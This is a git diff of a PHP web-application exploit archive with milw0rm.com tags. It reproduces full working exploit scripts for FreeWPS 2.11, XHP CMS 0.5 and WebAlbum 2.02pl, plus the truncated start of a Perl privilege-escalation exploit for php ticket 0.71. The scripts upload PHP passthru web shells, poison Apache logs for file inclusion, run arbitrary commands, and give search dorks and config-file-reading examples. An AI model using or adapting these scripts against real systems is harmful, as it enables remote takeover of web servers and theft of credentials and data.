-# milw0rm.com [2006-03-21]
+<?
+error_reporting(E_ERROR);
+
+function exploit_init()
+{
+    if (!extension_loaded('php_curl') && !extension_loaded('curl'))
+    {
+       if (!dl('curl.so') && !dl('php_curl.dll'))
+       die ("oo error - cannot load curl extension!");
+    }
+}
+
+function exploit_header()
+{
+    echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";
+    echo "                                  oo    ooooooo     ooooooo\n";
+    echo "                    oooo   oooo o888  o88     888 o888   888o\n";
+    echo "                      888o888    888        o888   888888888\n";
+    echo "                      o88888o    888     o888   o 888o   o888\n";
+    echo "                    o88o   o88o o888o o8888oooo88   88ooo88\n";
+    echo "ooooooooooooooooooooooooooooo freewps 2.11 exploit ooooooooooooooooooooooooooooo\n";
+    echo "oo usage          $ php freewps-211-exploit.php [url] [cmd]\n";
+    echo "oo proxy support  $ php freewps-211-exploit.php [url] [cmd] [proxy]:[port]\n";
+    echo "oo example        $ php freewps-211-exploit.php http://localhost 'ls -a'\n";
+    echo "oo execute a command on the remote system by uploading a shell\n\n";
+    echo "oo command : " . $_SERVER['argv'][2] . "\n\n";
+}
+
+function exploit_bottom()
+{
+    echo "\noo greets   : b0xC - i want to wish you a happy 21st birthday! this is my small\n";
+    echo "              present for you. :)\n";
+    echo "oo discover : x128 - alexander wilhelm - 21/03/2006\n";
+    echo "oo contact  : exploit <at> x128.net                    oo website : www.x128.net\n";
+}
+
+function exploit_execute()
+{
+    $connection = curl_init();
+
+    if ($_SERVER['argv'][3])
+    {
+        curl_setopt($connection, CURLOPT_TIMEOUT, 8);
+        curl_setopt($connection, CURLOPT_PROXY, $_SERVER['argv'][3]);
+    }
+    curl_setopt ($connection, CURLOPT_USERAGENT, 'x128');
+    curl_setopt ($connection, CURLOPT_RETURNTRANSFER, 1);
+    curl_setopt ($connection, CURLOPT_HEADER, 0);
+
+    curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/upload/shell.php");
+    $source = curl_exec($connection);
+
+    if(strpos($source, "404"))
+    {
+       $shell = fopen("shell.php", "w");
+       fwrite($shell, "<? ini_set(max_execution_time,0); passthru(\$HTTP_GET_VARS[shell]); ?>");
+       fclose($shell);
+
+       curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/htmlarea/popups/ImageManager/images.php");
+       curl_setopt ($connection, CURLOPT_POST, 1);
+       curl_setopt ($connection, CURLOPT_POSTFIELDS, array("upload" => "@shell.php", "dirPath"=> "/upload"));
+       curl_exec($connection) or die("oo error - cannot connect!\n");
+
+       sleep(2);
+       unlink("shell.php");
+    }
+    curl_setopt ($connection, CURLOPT_POST, 0);
+    curl_setopt ($connection, CURLOPT_URL, $_SERVER['argv'][1] . "/upload/shell.php?shell=" . urlencode($_SERVER['argv'][2]));
+
+    $source = curl_exec($connection) or die("oo error - cannot connect!\n");
+
+    echo $source;
+
+    curl_close ($connection);
+}
+
+exploit_init();
+exploit_header();
+exploit_execute();
+exploit_bottom();
+?>
+
+# milw0rm.com [2006-03-21]
diff --git a/platforms/php/webapps/1605.php b/platforms/php/webapps/1605.php
index b4b02b04e..9c8f635e3 100755
--- a/platforms/php/webapps/1605.php
+++ b/platforms/php/webapps/1605.php
@@ -1,180 +1,180 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "XHP CMS <= 0.5 remote cmmnds xctn\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-
-echo "dork: \"powered by XHP CMS\"\r\n\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to XHP\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /xhp/ cat ./../dbconfig.php\r\n";
-echo "php ".$argv[0]." localhost /xhp/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
-die;
-}
-
-/* explaination:
- without to have admin rights, you can have access to FileManager plugin
- to upload php files:
-
- http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/manager.php
-
- or
-
- http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/standalonemanager.php
-
- after, you can launch commands from them, ex:
-
- http://[target]/[path]/filemanager/suntzu.php?cmd=cat%20./../dbconfig.php
-
-									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$action=$argv[3];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-
-srand(make_seed());
-$anumber = rand(1,99999);
-
-   echo "[1] Uploading a shell...\r\n";
-$data='-----------------------------7d61592213049c
-Content-Disposition: form-data; name="dir"
-
-/
------------------------------7d61592213049c
-Content-Disposition: form-data; name="upload"; filename="suntzu'.$anumber.'.php"
-Content-Type: text/plain
-
-<?php
-if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}
-ini_set("max_execution_time",0);
-echo "*delim*";
-passthru($_GET[cmd]);
-echo "*delim*";
-?>
------------------------------7d61592213049c
-Content-Disposition: form-data; name="submit"
-
-Upload
------------------------------7d61592213049c--
-';
-  $packet="POST ".$p."inc/htmlarea/plugins/FileManager/images.php HTTP/1.0\r\n";
-  $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Content-Length: ".strlen($data)."\r\n";
-  $packet.="Connection: close\r\n\r\n";
-  $packet.=$data;
-  #echo quick_dump($packet);
-  sendpacketii($packet);
-  sleep(1);
-  echo "[2] Launch commands...\r\n";
-  $packet="GET ".$p."filemanager/suntzu".$anumber.".php?cmd=".$cmd." HTTP/1.0\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  #echo quick_dump($packet);
-  sendpacketii($packet);
-  if (strstr($html,"*delim*"))
-  {
-  echo "Exploit succeeded...\r\n\r\n";
-  $temp=explode("*delim*",$html);
-  echo $temp[1];
-  }
-  else
-  {echo "Exploit failed...\r\n";}
-?>
-
-# milw0rm.com [2006-03-22]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "XHP CMS <= 0.5 remote cmmnds xctn\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+
+echo "dork: \"powered by XHP CMS\"\r\n\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to XHP\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /xhp/ cat ./../dbconfig.php\r\n";
+echo "php ".$argv[0]." localhost /xhp/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
+die;
+}
+
+/* explaination:
+ without to have admin rights, you can have access to FileManager plugin
+ to upload php files:
+
+ http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/manager.php
+
+ or
+
+ http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/standalonemanager.php
+
+ after, you can launch commands from them, ex:
+
+ http://[target]/[path]/filemanager/suntzu.php?cmd=cat%20./../dbconfig.php
+
+									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$action=$argv[3];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+
+srand(make_seed());
+$anumber = rand(1,99999);
+
+   echo "[1] Uploading a shell...\r\n";
+$data='-----------------------------7d61592213049c
+Content-Disposition: form-data; name="dir"
+
+/
+-----------------------------7d61592213049c
+Content-Disposition: form-data; name="upload"; filename="suntzu'.$anumber.'.php"
+Content-Type: text/plain
+
+<?php
+if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}
+ini_set("max_execution_time",0);
+echo "*delim*";
+passthru($_GET[cmd]);
+echo "*delim*";
+?>
+-----------------------------7d61592213049c
+Content-Disposition: form-data; name="submit"
+
+Upload
+-----------------------------7d61592213049c--
+';
+  $packet="POST ".$p."inc/htmlarea/plugins/FileManager/images.php HTTP/1.0\r\n";
+  $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Content-Length: ".strlen($data)."\r\n";
+  $packet.="Connection: close\r\n\r\n";
+  $packet.=$data;
+  #echo quick_dump($packet);
+  sendpacketii($packet);
+  sleep(1);
+  echo "[2] Launch commands...\r\n";
+  $packet="GET ".$p."filemanager/suntzu".$anumber.".php?cmd=".$cmd." HTTP/1.0\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  #echo quick_dump($packet);
+  sendpacketii($packet);
+  if (strstr($html,"*delim*"))
+  {
+  echo "Exploit succeeded...\r\n\r\n";
+  $temp=explode("*delim*",$html);
+  echo $temp[1];
+  }
+  else
+  {echo "Exploit failed...\r\n";}
+?>
+
+# milw0rm.com [2006-03-22]
diff --git a/platforms/php/webapps/1608.php b/platforms/php/webapps/1608.php
index f9b2ae66d..a58be3ac6 100755
--- a/platforms/php/webapps/1608.php
+++ b/platforms/php/webapps/1608.php
@@ -1,188 +1,188 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "WebAlbum <= 2.02pl \$_COOKIE[skin2] remote cmmnds xctn \r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-echo "-> this works with magic_quotes_gpc=Off\r\n";
-echo "dork: WEBalbum 2004-2006 duda\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to WebAlbum\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /webalbum/ cat ./inc/config.php\n";
-echo "php ".$argv[0]." localhost /webalbum/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
-die;
-}
-
-/*short explaination:
-  software site: http://www.web-album.org/
-
-  this app stores paths inside cookies, but they are not sanitized before to
-  include files. We need a null char to break path to apache log files, so it
-  works with magic_quotes_gpc=Off.
-									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "[1] Injecting some code in log files...\r\n";
-$CODE ='suntzu<?php passthru($_GET[cmd]);die;?>suntzu';
-$packet.="GET ".$path.$CODE." HTTP/1.1\r\n";
-$packet.="User-Agent: ".$CODE."\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-
-# fill with possible locations
-$paths= array (
-"../../../../../../../../../../var/log/httpd/access_log",
-"../../../../../../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../../../../../../etc/httpd/logs/acces_log",
-"../../../../../../../../../../etc/httpd/logs/acces.log",
-"../../../../../../../../../../etc/httpd/logs/error_log",
-"../../../../../../../../../../etc/httpd/logs/error.log",
-"../../../../../../../../../../var/www/logs/access_log",
-"../../../../../../../../../../var/www/logs/access.log",
-"../../../../../../../../../../usr/local/apache/logs/access_log",
-"../../../../../../../../../../usr/local/apache/logs/access.log",
-"../../../../../../../../../../var/log/apache/access_log",
-"../../../../../../../../../../var/log/apache/access.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/www/logs/error_log",
-"../../../../../../../../../../var/www/logs/error.log",
-"../../../../../../../../../../usr/local/apache/logs/error_log",
-"../../../../../../../../../../usr/local/apache/logs/error.log",
-"../../../../../../../../../../var/log/apache/error_log",
-"../../../../../../../../../../var/log/apache/error.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/log/error_log"
-);
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-$a=$i+2;
-echo "[".$a."] trying with ".$paths[$i]."%00 ...\r\n";
-$packet ="GET ".$p."start.php?cmd=".$cmd." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: skin2=".$paths[$i]."%00;\r\n";
-$packet.="Connection: Close\r\n\r\n";
-//echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"suntzu"))
-{
- echo "Exploit succeeded...\r\n";
- $temp=explode("suntzu",$html);
- die($temp[1]);
-}
-}
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-03-25]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "WebAlbum <= 2.02pl \$_COOKIE[skin2] remote cmmnds xctn \r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+echo "-> this works with magic_quotes_gpc=Off\r\n";
+echo "dork: WEBalbum 2004-2006 duda\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to WebAlbum\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /webalbum/ cat ./inc/config.php\n";
+echo "php ".$argv[0]." localhost /webalbum/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
+die;
+}
+
+/*short explaination:
+  software site: http://www.web-album.org/
+
+  this app stores paths inside cookies, but they are not sanitized before to
+  include files. We need a null char to break path to apache log files, so it
+  works with magic_quotes_gpc=Off.
+									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "[1] Injecting some code in log files...\r\n";
+$CODE ='suntzu<?php passthru($_GET[cmd]);die;?>suntzu';
+$packet.="GET ".$path.$CODE." HTTP/1.1\r\n";
+$packet.="User-Agent: ".$CODE."\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+
+# fill with possible locations
+$paths= array (
+"../../../../../../../../../../var/log/httpd/access_log",
+"../../../../../../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../../../../../../etc/httpd/logs/acces_log",
+"../../../../../../../../../../etc/httpd/logs/acces.log",
+"../../../../../../../../../../etc/httpd/logs/error_log",
+"../../../../../../../../../../etc/httpd/logs/error.log",
+"../../../../../../../../../../var/www/logs/access_log",
+"../../../../../../../../../../var/www/logs/access.log",
+"../../../../../../../../../../usr/local/apache/logs/access_log",
+"../../../../../../../../../../usr/local/apache/logs/access.log",
+"../../../../../../../../../../var/log/apache/access_log",
+"../../../../../../../../../../var/log/apache/access.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/www/logs/error_log",
+"../../../../../../../../../../var/www/logs/error.log",
+"../../../../../../../../../../usr/local/apache/logs/error_log",
+"../../../../../../../../../../usr/local/apache/logs/error.log",
+"../../../../../../../../../../var/log/apache/error_log",
+"../../../../../../../../../../var/log/apache/error.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/log/error_log"
+);
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+$a=$i+2;
+echo "[".$a."] trying with ".$paths[$i]."%00 ...\r\n";
+$packet ="GET ".$p."start.php?cmd=".$cmd." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: skin2=".$paths[$i]."%00;\r\n";
+$packet.="Connection: Close\r\n\r\n";
+//echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"suntzu"))
+{
+ echo "Exploit succeeded...\r\n";
+ $temp=explode("suntzu",$html);
+ die($temp[1]);
+}
+}
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-03-25]
diff --git a/platforms/php/webapps/1609.pl b/platforms/php/webapps/1609.pl
index 9cf65b133..094ed8bd8 100755
--- a/platforms/php/webapps/1609.pl
+++ b/platforms/php/webapps/1609.pl
@@ -1,116 +1,116 @@
-#!/usr/bin/perl
-
-###############################################################################
-#Copyright (C) undefined1_
-#
-#This program is free software; you can redistribute it and/or
-#modify it under the terms of the GNU General Public License
-#as published by the Free Software Foundation; either version 2
-#of the License, or (at your option) any later version.
-#
-#This program is distributed in the hope that it will be useful,
-#but WITHOUT ANY WARRANTY; without even the implied warranty of
-#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-#GNU General Public License for more details.
-#
-#You should have received a copy of the GNU General Public License
-#along with this program; if not, write to the Free Software
-#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
-#
-###############################################################################
-
-use strict; 
-use IO::Socket;
-
-$| = 1;
-printf ":: php ticket <= 0.71 exploit (privilege escalation) - by undefined1_ @ bash-x.net/undef/ ::\n\n\n";
-
-
-my $website = shift || usage();
-my $user = shift || usage();
-my $password = shift || usage();
-
-my $path = "/";
-my $site = $website;
-if(index($website, "/") != -1)
-{
-	my $index = index($website, "/");
-	$path = substr($website, $index);
-	$site = substr($website, 0, $index);
-	if(substr($path, length($path)-1) ne "/")
-	{
-		$path .= "/";
-	}
-}
-
-
-my $eop = "\r\nHost: $site\r\n";
-$eop .= "User-Agent: Mozilla/5.0\r\n";
-$eop .= "Connection: close\r\n";
-
-
-
-my $packet1 = "POST ".$path."search.php HTTP/1.1\r\n";
-my $postdata = "Content-Type: application/x-www-form-urlencoded\r\n";
-$postdata .= "Host: $site\r\n";
-$postdata .= "User-Agent: Mozilla/5.0\r\n";
-$postdata .= "Connection: close\r\n";
-$postdata .= "Content-Length: 31\r\n";
-$postdata .= "Cookie: PHPSESSID=aeb241ebabb33d5fb5ba756453f725e8\r\n\r\n";
-$postdata .= "frm_user=".$user."&frm_passwd=".$password;
-my $data = sendpacket($site, $packet1.$postdata);
-
-
-
-my $packet2 = "POST ".$path."search.php HTTP/1.1\r\n";
-$postdata = "Content-Type: application/x-www-form-urlencoded\r\n";
-$postdata .= "Host: $site\r\n";
-$postdata .= "User-Agent: Mozilla/5.0\r\n";
-$postdata .= "Connection: close\r\n";
-$postdata .= "Content-Length: 215\r\n";
-$postdata .= "Cookie: PHPSESSID=aeb241ebabb33d5fb5ba756453f725e8\r\n\r\n";
